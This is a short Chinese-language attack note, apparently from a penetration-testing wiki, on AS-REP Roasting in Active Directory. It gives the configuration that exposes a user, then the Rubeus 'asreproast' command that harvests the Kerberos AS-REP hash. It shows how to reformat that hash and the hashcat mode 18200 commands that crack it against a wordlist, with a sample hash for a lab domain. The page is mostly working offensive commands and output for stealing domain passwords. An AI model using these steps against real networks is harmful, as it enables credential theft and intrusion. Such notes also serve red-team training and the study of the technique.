AS REPRoasting

配置

给域用户fileserver配置不求kerberos预身份验证（Do not require Kerberos preauthentication）

利用

直接执行Rubeus获取设置了该选项的用户的hash

rubeus.exe asreproast

拼接hash，在$krb5asrep后面加一个$23

复制拼接
$krb5asrep$fileserver@fbi.gov:6BB9690E3DCA4EF848721AE4BCBF3B96$16A7623911CE088AD268E9B684C104C2882F3242D32652DCD81212374C7639DC8E88308397EC3BE54C1CAEAB9BFF185712DAEDF2C57D0A83C86A7F90AD4E5096524080E9B210C8A54DEFD697EE3DB606E6403C71F31094A038A39604EC3BF63962590437155551F5D784C181D88DCBCED43279C6E737562F8AF9910E80896B4BB85540BCDFFC2693396B59BBDFB102B9DBE3960D7913308DB6D6AF38EC52C8611AC35C731A884C7F62E000D444B91DA958F653BEFFE042ACF73E0127FF1B8D75D895A1A31776C63920BB9B3CCFF4F48DE69876A6CA7EE8FB67CEE1ADAE06AE19FC3E

添加$23
$krb5asrep$23$fileserver@fbi.gov:6BB9690E3DCA4EF848721AE4BCBF3B96$16A7623911CE088AD268E9B684C104C2882F3242D32652DCD81212374C7639DC8E88308397EC3BE54C1CAEAB9BFF185712DAEDF2C57D0A83C86A7F90AD4E5096524080E9B210C8A54DEFD697EE3DB606E6403C71F31094A038A39604EC3BF63962590437155551F5D784C181D88DCBCED43279C6E737562F8AF9910E80896B4BB85540BCDFFC2693396B59BBDFB102B9DBE3960D7913308DB6D6AF38EC52C8611AC35C731A884C7F62E000D444B91DA958F653BEFFE042ACF73E0127FF1B8D75D895A1A31776C63920BB9B3CCFF4F48DE69876A6CA7EE8FB67CEE1ADAE06AE19FC3E

hashcat爆破并查看结果

把hash放在hash.txt,密码字典放在pwd.txt,爆破
hashcat.exe -m 18200 hash.txt pwd.txt --force

查看结果（也可以在hashcat.potfile中查看）
hashcat hash.txt --show

PreviousDCSync NextTimeroasting

Last updated 2 years ago